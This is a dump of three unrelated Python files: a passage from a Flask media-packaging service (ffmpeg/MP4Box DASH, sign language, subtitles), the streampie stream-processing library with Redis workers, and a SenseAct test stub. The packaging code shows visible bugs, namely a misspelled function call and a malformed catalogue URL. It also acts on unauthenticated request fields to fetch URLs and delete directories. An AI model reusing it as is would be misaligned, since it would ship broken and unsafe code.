r = p._replace(path=urllib.parse.quote(p.path))
url = r.geturl()
return url
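# e.g. escape("http://host/my file.mp4") -> "http://host/my%20file.mp4"
# (only the path component is percent-encoded)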
def download(workdir, u, custom_extension = ""):
if (u.startswith('http://')) or (u.startswith('https://')):
# p = urlparse(u)
# r = p._replace(path=urllib.parse.quote(p.path))
# url = r.geturl()
basename = os.path.splitext(os.path.basename(u))[0]
extension = os.path.splitext(os.path.basename(u))[1]
print("Downloading " + u+ " to " + workdir + basename + custom_extension+ extension)
urllib.request.urlretrieve (u, workdir + basename + custom_extension+ extension)
print(u + " downloaded")
return workdir + basename +custom_extension+ extension
else:
url = u
print("Copying " + url)
basename = os.path.splitext(os.path.basename(url))[0]
extension = os.path.splitext(os.path.basename(url))[1]
copyfile(url, workdir + basename + custom_extension +extension)
print(url + " copied")
return workdir + basename + custom_extension + extension
@app.route("/test_callback", methods=["POST"])
def callback():
content = request.json
pprint(content)
return "ok"
def removeDuplicates(p):
lines = []
with open(p) as f:
content = f.readlines()
lines = [x[0] for x in groupby(content)]
outF = open(p, "w")
for line in lines:
outF.write(line)
outF.close()
def sendResp(url, resp):
params = json.dumps(resp).encode('utf8')
req = urllib.request.Request(url, data=params,
headers={'content-type': 'application/json'})
response = urllib.request.urlopen(req)
def mapLang(lang):
if lang.startswith( 'ca' ):
return "cat"
if lang.startswith( 'en' ):
return "eng"
if lang.startswith( 'de' ):
return "deu"
if lang.startswith( 'es' ):
return "esp"
else:
return lang
def mapLangSL(lang):
if lang.startswith( 'ca' ):
return "csc"
elif lang.startswith( 'en_US' ):
return "ase"
elif lang.startswith( 'en' ):
return "bfi"
elif lang.startswith( 'de' ):
return "gsg"
elif lang.startswith( 'es' ):
return "ssp"
else:
return lang
def mapLang2(lang):
if lang.startswith( 'ca' ):
return "ca"
if lang.startswith( 'en' ):
return "en"
if lang.startswith( 'de' ):
return "de"
if lang.startswith( 'es' ):
return "es"
else:
return lang
def remove_blanks(node):
for x in node.childNodes:
if x.nodeType == Node.TEXT_NODE:
if x.nodeValue:
x.nodeValue = x.nodeValue.strip()
elif x.nodeType == Node.ELEMENT_NODE:
remove_blanks(x)
def tcToMilliseconds(timecode):
comps = timecode.split(':')
return int(comps[0])*3600000+ int(comps[1])*60000 + float(comps[2])*1000
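# e.g. tcToMilliseconds("00:01:02.5") -> 62500.0 (milliseconds)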
def package(content):
workdir = "/tmp/" + ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10)) + "/"
os.mkdir(workdir)
packagedDir = content["publicationCdn"] + "/"
jsonBDD = content["publicationFile"].replace("https://imac.gpac-licensing.com/", "/var/www/html/")
resolutions = content["files"]["mainVideo"][0]["transcode"]
videoFile = content["files"]["mainVideo"][0]["url"]
originalLang =content["language"]
if content["language"] == "de":
content["language"] = "Deutsch"
elif content["language"] == "fr":
content["language"] = "Français"
elif content["language"] == "ca":
content["language"] = "Català"
elif content["language"] == "es":
content["language"] = "Español"
else:
content["language"] = "English"
dirName = str(content["assetId"]) +"/"
outputDir = packagedDir + dirName
if os.path.isdir(outputDir):
shutil.rmtree(outputDir)
os.mkdir(outputDir)
videoBasename = os.path.splitext(os.path.basename(videoFile))[0]
try:
videoFile = download(workdir, videoFile)
except Exception as err:
print(err)
sendResp(content["callbackUrl"], {"result":0, "assetId":content["assetId"], "language": content["language"], "msg": "Could not download " + videoFile } )
return
for resolution in resolutions:
print("Transcoding the resolution " + str(resolution))
args = ["ffmpeg", "-y", "-i", videoFile, "-an",
"-vf", "scale=-2:"+str(resolution)+",fps=fps=30", "-c:v",
"libx264", "-bf", "0", "-crf", "22", "-keyint_min", "60", "-g", "60", "-sc_threshold", "0","-write_tmcd", "0",
outputDir + videoBasename
+ "_" + str(resolution) +"p.mp4"]
ret = subprocess.call(args)
if ret!= 0:
shutil.rmtree(workdir)
sendResp(content["callbackUrl"], {"result":0, "assetId":content["assetId"], "language": content["language"], "msg": "Could not transcode the base video" } )
return
mp4boxArgs = ["MP4Box", "-dash", "2000", "-profile", "live", "-out", outputDir + "manifest.mpd"]
audios = [ {'url': videoFile, 'urn:mpeg:dash:role:2011': 'main', 'language': mapLang(originalLang)}]
if "audio" in content["files"]:
for a in content["files"]["audio"]:
audios = audios + [a]
subtitles = []
if "subtitle" in content["files"]:
subtitles = content["files"]["subtitle"]
signers = []
if "signer" in content["files"]:
signers = content["files"]["signer"]
sls = []
for signer in signers:
#for signer in signers:
#Only use the first SL for now
signerFile = signer["url"] + "/index.xml"
try:
signerFile = download(workdir, signerFile)
except Exception:
sendResp(content["callbackUrl"], {"result":0, "assetId":content["assetId"], "language": content["language"], "msg": "Could not download " + signerFile } )
return
if not os.path.isfile(signerFile):
shutil.rmtree(workdir)
sendResp(content["callbackUrl"], {"result":0, "assetId":content["assetId"], "language": content["language"], "msg": "The SL couldn't be fetched" } )
return
signerTree=ET.parse(signerFile)
signerRoot=signerTree.getroot()
slVids = []
for el in signerRoot.iter():
if el.tag == "video":
try:
vid = download(workdir, signer["url"] + el.get("src"))
except Exception:
sendResp(content["callbackUrl"], {"result":0, "assetId":content["assetId"], "language": content["language"], "msg": "Could not download " + signer["url"] + el.get("src") } )
return
slVids = slVids + [{"id" : el.get("{http://www.w3.org/XML/1998/namespace}id"), "begin": el.get("begin"), "end": el.get("end"), "file": vid}]
#suppose we are at 600x600
segments = []
for el in signerRoot.findall(".//{http://www.w3.org/ns/ttml}body/{http://www.imac-project.eu}slSegments/{http://www.w3.org/ns/ttml}div/{http://www.w3.org/ns/ttml}p"):
if el.tag == "{http://www.w3.org/ns/ttml}p":
f = workdir + el.get("{http://www.w3.org/XML/1998/namespace}id") + ".mp4"
segments = segments + [{"id" : el.get("{http://www.w3.org/XML/1998/namespace}id"), "begin": el.get("begin"), "end": el.get("end"), "file": f}]
# transcoding so we are frame accurate
#TODO: trim if diff < threshold
for i in range(len(segments)):
print("cutting between " +segments[i]["begin"] + " and "+ segments[i]["end"])
args = ["ffmpeg", "-y", "-i", slVids[0]["file"], "-ss", segments[i]["begin"], "-to", segments[i]["end"], "-filter:v", 'crop=ih:ih,scale=600:600,fps=fps=30', "-bf", "0", "-crf", "22", "-c:v",
"libx264", "-keyint_min", "60", "-g", "60", "-sc_threshold", "0","-write_tmcd", "0", "-an", segments[i]["file"]]
ret = subprocess.call(args)
blanks = ["" for i in range(len(segments))]
for i in range(len(segments)):
if i < len(segments)-1:
duration = (tcToMilliseconds(segments[i+1]["begin"]) - tcToMilliseconds(segments[i]["end"]))/1000.0
if duration >0:
blank = workdir + segments[i]["id"] + "_" + segments[i+1]["id"] + ".mp4"
blanks[i] = blank
args = ["ffmpeg", "-t", str(duration), '-f', 'lavfi', '-i', 'color=c=black:s=600x600:rate=30', '-c:v', 'libx264', '-tune', 'stillimage', '-pix_fmt', 'yuv420p', blank]
ret = subprocess.call(args)
playlist = "# playlist to concatenate"
for i in range(len(segments)):
playlist = playlist+ "\n file '" + segments[i]["file"] +"'"
if i < len(segments)-1 and blanks[i] != "":
playlist = playlist + "\n file '" + blanks[i] +"'"
print("Encoding sign language stuff")
print(playlist)
with open(workdir + "/list.txt", "w") as f:
f.write(playlist)
outsl = workdir + "/sl" + signer["language"] +".mp4"
args = ["ffmpeg", "-f", "concat", "-safe", "0", "-i", workdir + "/list.txt", "-bf", "0", "-b:v", "500k", "-minrate", "500k", "-maxrate", "500k", "-c:v","libx264", "-keyint_min", "60", "-g", "60", "-sc_threshold", "0","-write_tmcd", "0", "-an", outsl]
ret = subprocess.call(args)
sls = sls + [{"file": outsl, "role": signer["urn:mpeg:dash:role:2011"], "language": signer["language"]}]
#if audio is muxed, only take the video from it
mp4boxArgs = mp4boxArgs
for resolution in resolutions:
mp4boxArgs = mp4boxArgs + [outputDir + videoBasename + "_" + str(resolution) +"p.mp4#video:role=main"]
for audio in audios:
try:
f = download(outputDir, audio["url"], "-" + audio["language"])
except Exception:
sendResp(content["callbackUrl"], {"result":0, "assetId":content["assetId"], "language": content["language"], "msg": "Could not download " + audio["url"]} )
return
if f.endswith(".aac"):
arg = ["MP4Box", "-add", f, f.replace(".", "-")+".mp4"]
subprocess.call(arg)
# set the correct language
arg = ["MP4Box", "-lang", mapLang(audio["language"]), f.replace(".", "-")+".mp4"]
subprocess.call(arg)
mp4boxArgs = mp4boxArgs + [ f+".mp4"+"#audio:role="+audio["urn:mpeg:dash:role:2011"]]
elif f.endswith(".mp4"):
arg = ["MP4Box", "-lang", mapLang(audio["language"]), f]
subprocess.call(arg)
mp4boxArgs = mp4boxArgs + [f+"#audio:role="+audio["urn:mpeg:dash:role:2011"]]
elif f.endswith(".ad"): #TODO extract & stuff
continue
else:
mp4boxArgs = mp4boxArgs + [f+"#audio:role="+audio["urn:mpeg:dash:role:2011"]]
if os.path.isfile(outputDir + videoBasename):
print("Video exists")
print(' '.join(mp4boxArgs))
ret = subprocess.call(mp4boxArgs)
if ret != 0:
print("MP4Box failed")
print(' '.join(mp4boxArgs))
shutil.rmtree(workdir)
sendResp(content["callbackUrl"], {"result":0, "assetId":content["assetId"], "language": content["language"], "msg": "Couldn't DASH the assets" } )
return
tree=ET.parse(outputDir + "manifest.mpd")
root=tree.getroot()
# Fix once we have all SL segments
for sl in sls:
sl["manifest"] = os.path.basename (sl["file"]).replace(".mp4", "") + ".mpd"
mp4boxArgsSL = ["MP4Box", "-dash", "2000", "-profile", "live", "-out", outputDir + sl["manifest"]]
mp4boxArgsSL = mp4boxArgsSL + [ sl["file"] + "#video:role="+ sl["role"]]
subprocess.call(mp4boxArgsSL)
for item in root.findall('{urn:mpeg:dash:schema:mpd:2011}Period'):
AS = ET.Element("AdaptationSet")
AS.set("contentType", "video")
AS.set("id","signerVideo_" + mapLang(sl["language"]))
AS.set("lang", "sgn-"+mapLangSL(sl["language"]))
supp = ET.Element("SupplementalProperty")
supp.set("schemeIdUri", "urn:imac:signer-metadata-adaptation-set-id:2019")
supp.set("value","signerMetadata_" + mapLang(sl["language"]))
AS.append(supp)
role = ET.Element("Role")
role.set("schemeIdUri", "urn:mpeg:dash:role:2011")
role.set("value", "sign") #until fixed in the ACM
AS.append(role)
representation = ET.Element("Representation")
representation.set("id", "signer_600")
BaseURL = ET.Element("BaseURL")
BaseURL.text = sl["manifest"]
representation.append(BaseURL)
AS.append(representation)
item.append(AS)
print("Sign language added")
for i, sub in enumerate(subtitles):
try:
subFile = download(outputDir, sub["url"])
except Exception:
sendResp(content["callbackUrl"], {"result":0, "assetId":content["assetId"], "language": content["language"], "msg": "Could not download " + sub["url"]} )
return
basename = os.path.splitext(os.path.basename(sub["url"]))[0]
extension = os.path.splitext(os.path.basename(sub["url"]))[1]
for item in root.findall('{urn:mpeg:dash:schema:mpd:2011}Period'):
AS = ET.Element("AdaptationSet")
AS.set("contentType", "text")
AS.set("mimeType","application/ttml+xml")
AS.set("segmentAlignment", "true")
AS.set("lang", mapLang(sub["language"]))
role = ET.Element("Role")
role.set("schemeIdUri", "urn:mpeg:dash:role:2011")
role.set("value", "subtitle") #until fixed in the ACM
AS.append(role)
representation = ET.Element("Representation")
representation.set("id", "xml_" + mapLang(sub["language"]) + "_" + str(i))
representation.set("bandwidth", "1000")
BaseURL = ET.Element("BaseURL")
BaseURL.text = basename + extension
representation.append(BaseURL)
AS.append(representation)
item.append(AS)
print("Subtitle added")
hasAD=False
ases = root.findall(".//{urn:mpeg:dash:schema:mpd:2011}Period/{urn:mpeg:dash:schema:mpd:2011}AdaptationSet")
for AS in ases:
if AS.find("{urn:mpeg:dash:schema:mpd:2011}Role").get("value") == "alternate":
reps = AS.findall("{urn:mpeg:dash:schema:mpd:2011}Representation")
for rep in reps:
print(rep.find("{urn:mpeg:dash:schema:mpd:2011}SegmentTemplate").get("media"))
for audio in content["files"]["audio"]:
if audio["containsAD"] == "1" and os.path.splitext(os.path.basename(audio["url"]))[0] in rep.find("{urn:mpeg:dash:schema:mpd:2011}SegmentTemplate").get("media"):
hasAD = True
ad = ET.Element("AudioDescription")
ad.set("gain", audio["ADgain"])
if "classic" in os.path.splitext(os.path.basename(audio["url"]))[0]:
ad.set("mode", "classic")
elif "static" in os.path.splitext(os.path.basename(audio["url"]))[0]:
ad.set("mode", "static")
elif "dynamic" in os.path.splitext(os.path.basename(audio["url"]))[0]:
ad.set("mode", "dynamic")
break
rep.append(ad)
ET.register_namespace('', "urn:mpeg:dash:schema:mpd:2011")
if hasAD:
ET.register_namespace('imac', "urn:imac:audio-description:2019")
#tree.write(outputDir + "manifest.mpd", xml_declaration=True)
print("Writing manifest")
with open(outputDir+ "manifest.mpd", "wb") as xmlfile:
mydata = ET.tostring(root)
xmlfile.write(mydata)
isDash2 = "dash2" in content["publicationCdn"]
directory = "dash"
if isDash2:
directory = directory + "2"
removeDupicates(outputDir+ "manifest.mpd")
with open(jsonBDD) as f:
data = json.load(f)
subs = [dict()]
if "ST" in content["acces"]:
for acc in content["acces"]["ST"]:
for s in subtitles:
if s["language"] == acc:
base = os.path.splitext(os.path.basename(s["url"]))[0]
ext = os.path.splitext(os.path.basename(s["url"]))[1]
subs[0][acc]= "https://imac.gpac-licensing.com/" + directory + "/" + dirName +base+ext
slDic = [dict()]
if "SL" in content["acces"]:
for acc in content["acces"]["SL"]:
for s in sls:
if s["language"] == acc:
slDic[0][acc]= "https://imac.gpac-licensing.com/"+ directory+ "/" + dirName + s["manifest"]
data["contents"].append({
"acces":content["acces"], "descriptionArray":[content["descriptionArray"]],
"name": str(len(data["contents"])+1) + ": " + content["programmeName"],
"thumbnail": content["keyframe"],
"url": "https://imac.gpac-licensing.com"+ directory+"/" + dirName + "manifest.mpd",
"audioChannels" : 4,
"subtitles": subs,
"signer": slDic,
"poster": content["poster"],
"ad": [],
"ast": []
})
print("Writing json database")
with open(jsonBDD, 'w') as outfile:
json.dump(data, outfile, indent=2)
shutil.rmtree(workdir)
sendResp(content["callbackUrl"], {"result":1, "assetId":content["assetId"], "language": content["language"], "msg": "The content has been successfully packaged" } )
@app.route("/package", methods=["POST"])
def add_message():
content = request.json
process = Thread(target=package, args=[content])
process.start()
return "Packaging started"
|
streampie.py
|
import sys
import zlib
import dill
import redis
import random
import inspect
import threading
import traceback
import itertools
import collections
import multiprocessing
try:
# Python2
import Queue as queue
from collections import Iterable
ifilter = itertools.ifilter
imap = itertools.imap
except:
# Python3
import queue
# In python3, the abstract base classes moved to collections.abc,
# and filter and map by default return iterators
from collections.abc import Iterable
ifilter = filter
imap = map
def _ifilter_ext(predicate, iterable):
for i, val in enumerate(iterable):
if predicate and predicate(i, val):
yield val
def _iterqueue(queue):
"""
Take a queue and return an iterator over that queue.
"""
while 1:
item = queue.get()
if item is StopIteration:
queue.put(StopIteration)
break
yield item
class Stream():
"""
This is our generic stream class. It is iterable and it overloads the ``>>`` operator
for convenience.
"""
def __init__(self, obj=None):
self.iterator = None
if isinstance(obj, Iterable):
self.iterator = iter(obj)
def __iter__(self):
return self
# For python3
def __next__(self):
return self.next()
def next(self):
return next(self.iterator)
def __rshift__(self, other):
if inspect.isclass(other):
return other(self)
other.iterator = self
other._on_connect()
return Stream(other)
def __rrshift__(self, other):
return Stream(other) >> self
def __repr__(self):
return "Stream(%s)" % repr(self.iterator)
def _on_connect(self):
return NotImplemented
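# Minimal usage sketch (relies only on the processors defined below): ``>>`` either
# instantiates a processor class, wires a processor instance to the upstream iterator,
# or hands the stream to a plain callable such as ``list``.
#
# >>> range(6) >> filter(lambda x: x % 2 == 0) >> map(lambda x: x * 10) >> list
# [0, 20, 40]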
#
# Stream Processors
#
class take(Stream):
def __init__(self, n):
"""
Take the first ``n`` elements, and drop the rest.
>>> range(4) >> take(2) >> list
[0, 1]
"""
Stream.__init__(self)
self.n = n
def __iter__(self):
return itertools.islice(self.iterator, self.n)
class takei(Stream):
def __init__(self, indices):
"""
Take only the elements whose indices are given in the list.
>>> range(4) >> takei([0, 1]) >> list
[0, 1]
"""
Stream.__init__(self)
self.indices = indices
def __iter__(self):
def _filter(i, val):
return i in self.indices
return _ifilter_ext(_filter, self.iterator)
class drop(Stream):
def __init__(self, n):
"""
Drop the first `n` elements, and take the rest.
>>> range(4) >> drop(2) >> list
[2, 3]
"""
Stream.__init__(self)
self.n = n
def __iter__(self):
collections.deque(itertools.islice(self.iterator, self.n))
return self.iterator
class dropi(Stream):
def __init__(self, indices):
"""
Drop only the elements whose indices are given in the ``indices`` list.
>>> range(4) >> dropi([0, 1]) >> list
[2, 3]
"""
Stream.__init__(self)
self.indices = indices
def __iter__(self):
def _filter(i, val):
return not i in self.indices
return _ifilter_ext(_filter, self.iterator)
class chop(Stream):
def __init__(self, n):
"""
Split the stream into ``n``-sized chunks.
>>> range(4) >> chop(2) >> list
[[0, 1], [2, 3]]
"""
Stream.__init__(self)
self.n = n
def __iter__(self):
def _chop():
while 1:
chunk = list(itertools.islice(self.iterator, self.n))
if not chunk:
break
yield chunk
return _chop()
class map(Stream):
def __init__(self, function):
"""
Call the function ``func`` for every element, with the element as input.
>>> square = lambda x: x**2
>>> range(4) >> map(square) >> list
[0, 1, 4, 9]
"""
Stream.__init__(self)
self.function = function
def __iter__(self):
return imap(self.function, self.iterator)
class filter(Stream):
def __init__(self, function):
"""
Return only the elements for which the predicate ``func`` evaluates to ``True``.
>>> even = lambda x: x % 2 == 0
>>> range(4) >> filter(even) >> list
[0, 2]
"""
Stream.__init__(self)
self.function = function
def __iter__(self):
return ifilter(self.function, self.iterator)
class apply(Stream):
def __init__(self, function):
"""
Call the function ``func`` for every element, unpacking the element as its argument list.
>>> sum = lambda x,y: x+y
>>> range(4) >> chop(2) >> apply(sum) >> list
[1, 5]
"""
Stream.__init__(self)
self.function = function
def __iter__(self):
return itertools.starmap(self.function, self.iterator)
class takewhile(Stream):
def __init__(self, predicate):
"""
Take elements as long as the predicate ``func`` is ``True``; stop at the first element for which it is ``False``.
>>> range(4) >> takewhile(lambda x: x < 3) >> list
[0, 1, 2]
"""
Stream.__init__(self)
self.predicate = predicate
def __iter__(self):
return itertools.takewhile(self.predicate, self.iterator)
class dropwhile(Stream):
def __init__(self, predicate):
"""
Drop elements as long as the predicate ``func`` is ``True``; yield the rest starting from the first element for which it is ``False``.
>>> range(4) >> dropwhile(lambda x: x < 3) >> list
[3]
"""
Stream.__init__(self)
self.predicate = predicate
def __iter__(self):
return itertools.dropwhile(self.predicate, self.iterator)
class prepend(Stream):
def __init__(self, prep_iterator):
"""
Prepend elements to a stream.
>>> range(4) >> prepend([10, 9]) >> list
[10, 9, 0, 1, 2, 3]
"""
Stream.__init__(self)
self.prep_iterator = prep_iterator
def __iter__(self):
return itertools.chain(self.prep_iterator, self.iterator)
class flatten(Stream):
"""
Flatten an arbitrarily-deep list of lists into a single list.
>>> [0,[1,[2,[3]]]] >> flatten() >> list
[0, 1, 2, 3]
"""
def __iter__(self):
def _flatten(iterator):
stack = []
while 1:
try:
item = next(iterator)
if isinstance(item, Iterable):
stack.append(iter(item))
else:
yield item
except StopIteration:
try:
iterator = stack.pop()
except IndexError:
break
return _flatten(self.iterator)
#
# Parallelism
#
class LocalPool(Stream):
def __init__(self, function, poolsize=None, args=[]):
"""
A generic class shared by all local (executed on the same machine) pools.
"""
Stream.__init__(self)
self.function = function
self.poolsize = poolsize
self.args = args
self.pool = []
if self.poolsize is None:
# No preferred poolsize? Use number of cores
self.poolsize = multiprocessing.cpu_count()
def _worker(self, wid):
try:
for val in self.function(wid, _iterqueue(self.in_queue), *self.args):
self.out_queue.put(val)
except:
# Catch all exceptions and just print them, but keep working
traceback.print_exc()
def _control(self):
# Move all data from the iterator to the input queue
for val in self.iterator:
self.in_queue.put(val)
# Last item in the queue is the stop-signal
self.in_queue.put(StopIteration)
# Wait for all workers to finish
for p in self.pool:
p.join()
# All workers finished, stop the output queue iterator
self.out_queue.put(StopIteration)
def stop(self):
"""
Terminate and wait for all workers to finish.
"""
# Wait for all workers to finish
for p in self.pool:
p.terminate()
def __iter__(self):
return _iterqueue(self.out_queue)
def _on_connect(self):
# Start the control thread
t = threading.Thread(target=self._start_workers)
t.daemon = True
t.start()
class ProcessPool(LocalPool):
def __init__(self, function, poolsize=None, args=[]):
"""
Create a process pool.
:param callable function: Function that each worker executes
:param int poolsize: How many workers the pool should make
:param list args: List of arguments to pass to the worker function
A simple example that calls the ``sum`` function for every pair of inputs.
>>> def sum(wid, items):
... # wid is the worker id
... # items is an iterator for the inputs to the stream
... for x, y in items:
... yield x + y
>>> range(6) >> chop(2) >> ProcessPool(sum) >> list # doctest: +SKIP
[1, 5, 9]
Note that the order of the output list is not guaranteed, as it depends
on the order in which the elements were consumed. By default, the class creates
as many workers as there are cores. Here is a more advanced example
showing ``poolsize`` control and passing additional arguments.
>>> def sum(wid, items, arg1, arg2):
... # arg1 and arg2 are additional arguments passed to the function
... for x, y in items:
... yield x + y
>>> sorted(range(6) >> chop(2) >> ProcessPool(sum, poolsize=8, args=[0, 1]) >> list)
[1, 5, 9]
The function can yield arbitrarily many results. For example, for a single input, two or more
yields can be made.
>>> def sum(wid, items):
... for x, y in items:
... yield x + y
... yield x + y
>>> sorted(range(6) >> chop(2) >> ProcessPool(sum) >> list)
[1, 1, 5, 5, 9, 9]
"""
LocalPool.__init__(self, function, poolsize, args)
self.in_queue = multiprocessing.Queue()
self.out_queue = multiprocessing.Queue()
def _start_workers(self):
# Start the worker processes
for x in range(self.poolsize):
p = multiprocessing.Process(target=self._worker, args=[x])
p.daemon = True
p.start()
self.pool.append(p)
self._control()
class ThreadPool(LocalPool):
def __init__(self, function, poolsize=None, args=[]):
"""
Create a thread pool.
:param callable function: Function that each worker executes
:param int poolsize: How many workers the pool should make
:param list args: List of arguments to pass to the worker function
>>> def sum(wid, items):
... # wid is the worker id
... # items is an iterator for the inputs to the stream
... for x, y in items:
... yield x + y
>>> range(6) >> chop(2) >> ThreadPool(sum) >> list # doctest: +SKIP
[1, 5, 9]
"""
LocalPool.__init__(self, function, poolsize, args)
self.in_queue = queue.Queue()
self.out_queue = queue.Queue()
def _start_workers(self):
# Start the worker threads
for x in range(self.poolsize):
t = threading.Thread(target=self._worker, args=[x])
t.daemon = True
t.start()
self.pool.append(t)
self._control()
class StandaloneProcessPool(ProcessPool):
def __init__(self, function, poolsize=None, args=[]):
"""
The standalone process pool is exactly like the :class:`ProcessPool` class, other than
the fact that it does not take any input, but constantly yields output.
:param callable function: Function that each worker executes
:param int poolsize: How many workers the pool should make
:param list args: List of arguments to pass to the worker function
To illustrate, here is an example of a worker that constantly returns random numbers.
Since there is no input stream, the pool needs to be manually terminated.
>>> import random
>>> def do_work(wid):
... yield random.random()
>>> pool = StandaloneProcessPool(do_work)
>>> for x, r in enumerate(pool): # doctest: +SKIP
... if x == 2:
... pool.stop()
... break
... print(r)
0.600151963181
0.144348185086
"""
ProcessPool.__init__(self, function, poolsize, args)
self.iterator = _iterqueue(self.out_queue)
multiprocessing.Process(target=self._start_workers).start()
def _worker(self, wid):
try:
for val in self.function(wid, *self.args):
self.out_queue.put(val)
except:
# Catch all exceptions and just print them, but keep working
traceback.print_exc()
def _control(self):
# Wait for all workers to finish
for p in self.pool:
p.join()
# All workers finished, stop the output queue iterator
self.out_queue.put(StopIteration)
#
# Distributed Parallelism
#
def _dumps(obj):
"""
Serialize and compress an object.
"""
return zlib.compress(dill.dumps(obj))
def _loads(data):
"""
Decompress and deserialize.
"""
return dill.loads(zlib.decompress(data))
class Job:
def __init__(self, target_id, args=[]):
"""
This class is our unit of work. It is fetched by a :class:`Worker`, its ``target`` is executed, and the
result (``ret``) and exception (if any) are stored and sent back to the :class:`JobQueue`.
:param int target_id: ID of the code to execute. See the source of :class:`JobQueue.enqueue` for details.
:param list args: List of arguments to pass to the worker function
"""
self.id = random.getrandbits(32)
self.target_id = target_id
self.args = args
# The return and exception values are populated by the Worker later on
self.ret = None
self.exception = None
class Worker:
def __init__(self, host="localhost", port=6379, db=10):
"""
The workhorse of our implementation. Each worker fetches a job from Redis,
executes it, then stores the results back into Redis.
:param str host: Redis hostname
:param int port: Redis port
:param int db: Redis database number
"""
self.db = redis.Redis(host=host, port=port, db=db)
self.target_cache = {}
def _fetch_job(self):
return _loads(self.db.blpop("job_queue")[1])
def _do_job(self, target, job):
try:
args = job.args
if not isinstance(args, (list, tuple)):
# Make sure that args are always a list/tuple
args = [args]
job.ret = target(*args)
except Exception as e:
# An exception occurred; print and log it
traceback.print_exc()
job.exception = e
# Add the job to the response queue
self.db.rpush("response_queue", _dumps(job))
def run(self):
"""
In an infinite loop, wait for jobs, then execute them and return the results to Redis.
"""
while 1:
# Blocks until a job is available
job = self._fetch_job()
if job.target_id in self.target_cache:
# We have the target code cached, great!
target = self.target_cache[job.target_id]
else:
# Fetch the code from redis and cache it
target = _loads(self.db.get("target_%d" % (job.target_id)))
self.target_cache[job.target_id] = target
print("Got job: 0x%08x" % (job.id))
# Execute the job in a separate process
p = multiprocessing.Process(target=self._do_job, args=(target, job))
p.daemon = True
p.start()
p.join()
class JobQueue(Stream):
def __init__(self, host="localhost", port=6379, db=10):
"""
.. warning:: The :class:`JobQueue` flushes the selected Redis database! Be sure to specify an unused database!
The queue that allows submission and fetching of completed jobs.
:param str host: Redis hostname
:param int port: Redis port
:param int db: Redis database number
That being said, here is an example of how to use the queue.
>>> def sum(x, y):
... return x + y
>>> q = JobQueue()
>>> q.enqueue(sum, (1, 2)) # doctest: +SKIP
>>> q.enqueue(sum, (2, 3)) # doctest: +SKIP
>>> q.enqueue(sum, (3, 4)) # doctest: +SKIP
>>> q.finalize()
>>> for r in q: # doctest: +SKIP
... print(r.ret)
3
5
7
"""
Stream.__init__(self)
self.db = redis.Redis(host=host, port=port, db=db)
self.db.flushdb()
self.cnt_queued = 0
self.cnt_got = 0
self.finalized = False
def next(self):
if self.finalized and self.cnt_got == self.cnt_queued:
raise StopIteration
job = _loads(self.db.blpop("response_queue")[1])
self.cnt_got += 1
return job
def enqueue(self, target, args):
"""
Add a job to the queue.
:param function target: Function to be executed
:param list args: Arguments provided to the job
"""
if self.finalized:
raise Exception("No more jobs allowed")
# Check if we have to add the target's code to redis
target_data = _dumps(target)
target_id = hash(target_data)
if not self.db.get("target_%d" % (target_id)):
# This target's code is not in Redis yet; store it once so that it does not
# have to be shipped with every job that is submitted/fetched.
self.db.set("target_%d" % (target_id), target_data)
# Add the new job to the redis list
self.db.rpush("job_queue", _dumps(Job(target_id, args)))
self.cnt_queued += 1
def finalize(self):
"""
Indicate to the queue that no more jobs will be submitted.
"""
self.finalized = True
class DistributedPool(Stream):
def __init__(self, function, host="localhost", port=6379, db=10):
"""
The distributed pool is a simple wrapper around the :class:`JobQueue` that makes it even more
convenient to use, just like :class:`ProcessPool` and :class:`ThreadPool`.
:param str host: Redis hostname
:param int port: Redis port
:param int db: Redis database number
First, on one machine let's start a single worker.
.. code-block:: bash
python streampie.py
We then execute:
>>> def mul(x, y):
... return x * y
>>> range(4) >> chop(2) >> DistributedPool(mul) >> list # doctest: +SKIP
[0, 6]
"""
Stream.__init__(self)
self.in_queue = queue.Queue()
self.out_queue = queue.Queue()
self.function = function
self.jq = JobQueue(host=host, port=port, db=db)
def _input_control(self):
# Move all data from the iterator to the input queue
for val in self.iterator:
self.jq.enqueue(self.function, val)
# Indicate to the queue that no more jobs will be added
self.jq.finalize()
def _output_control(self):
# Move all data from the job queue to the output queue
for job in self.jq:
self.out_queue.put(job.ret)
# All workers finished, stop the output queue iterator
self.out_queue.put(StopIteration)
def __iter__(self):
return _iterqueue(self.out_queue)
def _on_connect(self):
# Start the input and output control threads
self._input_thread = threading.Thread(target=self._input_control)
self._input_thread.daemon = True
self._input_thread.start()
self._output_control()
def stop(self):
"""
Currently not implemented. Is it even needed?
"""
return NotImplemented
if __name__ == "__main__":
# Act as a simple worker process
print("Starting worker...")
w = Worker()
w.run()
|
test_rtrl_base_env.py
|
# Copyright (c) 2018, The SenseAct Authors.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import copy
import numpy as np
import unittest
import time
import psutil
from multiprocessing import Process, Value, Array
from senseact import utils
from senseact.rtrl_base_env import RTRLBaseEnv
from senseact.communicator import Communicator
class MockCommunicator(Communicator):
"""
Basic barebone test communicator that can crash on demand.
"""
def __init__(self):
self._dt = 0.008
# shared variable that all processes will see
self.crash_flag = Value('i', 0)
sensor_args = {'array_len': 1, 'array_type': 'd', 'np_array_type': 'd'}
actuator_args = {'array_len': 1, 'array_type': 'd', 'np_array_type': 'd'}
super().__init__(use_sensor=True, use_actuator=True, sensor_args=sensor_args, actuator_args=actuator_args)
def _sensor_handler(self):
if self.crash_flag.value == 1:
raise Exception("Random sensor exception encountered")
self.sensor_buffer.write(0)
time.sleep(self._dt)
def _actuator_handler(self):
if self.crash_flag.value == 2:
raise Exception("Random actuator exception encountered")
if self.actuator_buffer.updated():
actuation, _, _ = self.actuator_buffer.read_update()
time.sleep(self._dt)
class MockEnv(RTRLBaseEnv):
"""
Basic barebone test environment that can crash on demand.
"""
def __init__(self, action_dim, observation_dim, **kwargs):
# shared variable that all processes will see
self.crash_flag = Value('i', 0)
self.reset_call_flag = Value('i', 0)
# Communicator Parameters
communicator_setups = {'generic1': {'Communicator': MockCommunicator,
'kwargs': {}},
'generic2': {'Communicator': MockCommunicator,
'kwargs': {}}
}
self._uniform_array_ = np.frombuffer(Array('d', 3).get_obj(), dtype=np.float64)
super().__init__(communicator_setups=communicator_setups,
action_dim=action_dim,
observation_dim=observation_dim,
**kwargs)
def _write_action(self, action):
if self.crash_flag.value == 3:
raise Exception("Write action crash triggered.")
super(MockEnv, self)._write_action(action)
def _compute_sensation_(self, name, sensor_window, timestamp_window, index_window):
if self.crash_flag.value == 1:
raise Exception("Compute sensation crash triggered.")
return [3,2,1]
